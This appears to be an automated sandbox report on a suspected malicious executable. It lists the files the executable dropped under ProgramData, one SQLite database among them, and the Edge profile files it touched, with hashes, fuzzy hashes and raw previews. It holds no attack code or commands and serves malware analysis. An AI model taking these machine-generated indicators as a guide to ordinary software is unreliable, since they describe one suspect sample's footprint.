                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\wt26ph

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\y5fc2v

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\yuaiwt

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\z5x4o8

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\zus26p

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08429357030659952
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vL:51zkVmvQhyn+Zoz672
                                                                                                                                                                                                                                                                                          MD5:8B4ED026960EA37550C7FFE6ADFB2DD3
                                                                                                                                                                                                                                                                                          SHA1:EFFEC68F2A1585A02C38A238FBB84BC458E259B6
                                                                                                                                                                                                                                                                                          SHA-256:0D9EF40E99393317439C76E6D7758D26550D0A72708973E0A78B41F0D462AD31
                                                                                                                                                                                                                                                                                          SHA-512:134514FCC07B18650D221913D46AB23100BE64450CD5341D9408A6210F63CAFD71D81F8BB7C46C813889F74E61EC90FFF753BCB214DEB479466BE78342A3A925
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\02f007e1-6f05-4d30-b3be-57fad5dc351d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):58896
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.104739523068133
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynKKKCBS2qX7bHwgorQXdbiR3oM:z/0+zI7ynKKKkS205Xdbe3
                                                                                                                                                                                                                                                                                          MD5:805422E4FC678172B04692C7FD5E673E
                                                                                                                                                                                                                                                                                          SHA1:9553BFD89B716539600D66E66D24DCC2BC0DC455
                                                                                                                                                                                                                                                                                          SHA-256:93AF3FC40EBE4E9C936E43E3C16BA5D794AE02F769260920E69E7B30B7F65EE9
                                                                                                                                                                                                                                                                                          SHA-512:3670DA91F7047E949C6CE8E6B50636889CDD4C79F351E0CE4BD8452138DE6947893DF1FF46B3AC1BA0AB5DD5456818C7F97A8096BC66A62A51A1826D3B0A35CC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\05f2211a-1a55-4a62-80b9-bfd0af554122.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):60329
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101939905785811
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:wMk1rT8HAnbKVCBS2qX7bjr8aPz3oWgorQXdbil:wMYrT8gbKVkS20/FoXdbu
                                                                                                                                                                                                                                                                                          MD5:C8DF32473BA1F3DB2F22E74D69898A42
                                                                                                                                                                                                                                                                                          SHA1:7732310711CC9804CBC03A21F4EED8E79C594B82
                                                                                                                                                                                                                                                                                          SHA-256:4C7187170CF6F483A443C3C35994307B30919A281D0A2323BDB129511ED88B15
                                                                                                                                                                                                                                                                                          SHA-512:793DB6F650F7B55EFD82FCF7209118641CBB40B77E4456214ED1CBEBAB9DFFD03C0157CC2AE96AAFE6C98435C7B730506B4180EF6994AD68EF4597AF170C3B0A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"3bb1df32-2538-414d-87e9-5dc77ba17dce"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735570534"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\21b7aa2e-251d-4067-84a9-9bb4671e6eda.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):60252
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101830795634821
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:wMk1rT8H1nbKtCBS2qX7bjr8aPz3oWgorQXdbil:wMYrT8VbKtkS20/FoXdbu
                                                                                                                                                                                                                                                                                          MD5:D3E78750D1245ECFD080D9215E054CF7
                                                                                                                                                                                                                                                                                          SHA1:2E790AF74E6A380D828FFC0F074DE779526A9C61
                                                                                                                                                                                                                                                                                          SHA-256:A4EA969F86D7EC6B6CC114C0EEFD2FD9EC721857C91E7241A331E73A0CF25424
                                                                                                                                                                                                                                                                                          SHA-512:438FBA8E27754AC9B741594316C3FD5E830582E8E7D7FE16E2630F09A55B21C3682F1E27A31B913EF694CA434D26CC8F272285C4CE64B12E5E5597C4A0F0758C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"3bb1df32-2538-414d-87e9-5dc77ba17dce"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735570534"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\27e1a76e-446a-4020-94b9-ebae832ea9dc.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58444
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101662738007985
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yneCBS2qX7b9tPHgorQXdbiR3oM:z/0+zI7ynekS20NtP0Xdbe3
                                                                                                                                                                                                                                                                                          MD5:BED066534D0302F7A3605DC9CC5EF0B4
                                                                                                                                                                                                                                                                                          SHA1:C5109EF3901241AA125645F047000D641485BC1C
                                                                                                                                                                                                                                                                                          SHA-256:908EFAC94F9EE126C54D884934ED738B3EA913E4536636E5371EB7BB48B368A8
                                                                                                                                                                                                                                                                                          SHA-512:DFBBDDA7A2C1881268C5BBAC878069F1B3348658CD6D80A789B7D7555CBA92C9B7DB8D0183C97DE8B99983F3C681C32FF49891209D6670EEAB4003EACF5E5E9A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\42cf7c93-fdf6-40ce-a394-bbae73245a03.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58978
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.104860550417435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7yOqKtCBS2qX7bjwgorQXdbiR3oM:z/0+zI7yOqKtkS20dXdbe3
                                                                                                                                                                                                                                                                                          MD5:50DA0E5AAEDC9DFFB0D71E16787CC327
                                                                                                                                                                                                                                                                                          SHA1:DE3A9C00FF0AB1A7945876DECA0C1805B31E509E
                                                                                                                                                                                                                                                                                          SHA-256:78D5B6FC40E5B7436678037837A3DE231B40D975EC011D78A5E1C05A23043FCF
                                                                                                                                                                                                                                                                                          SHA-512:F09BD534F6AEE5CE438DB357B27B1F09F38E897610279A9624692871CECE3256412156A7760558541E346F1604A3B53F523A812E1C78EBC3B0F22B09B4832693
                                                                                                                                                                                                                                                                                          Malicious:false
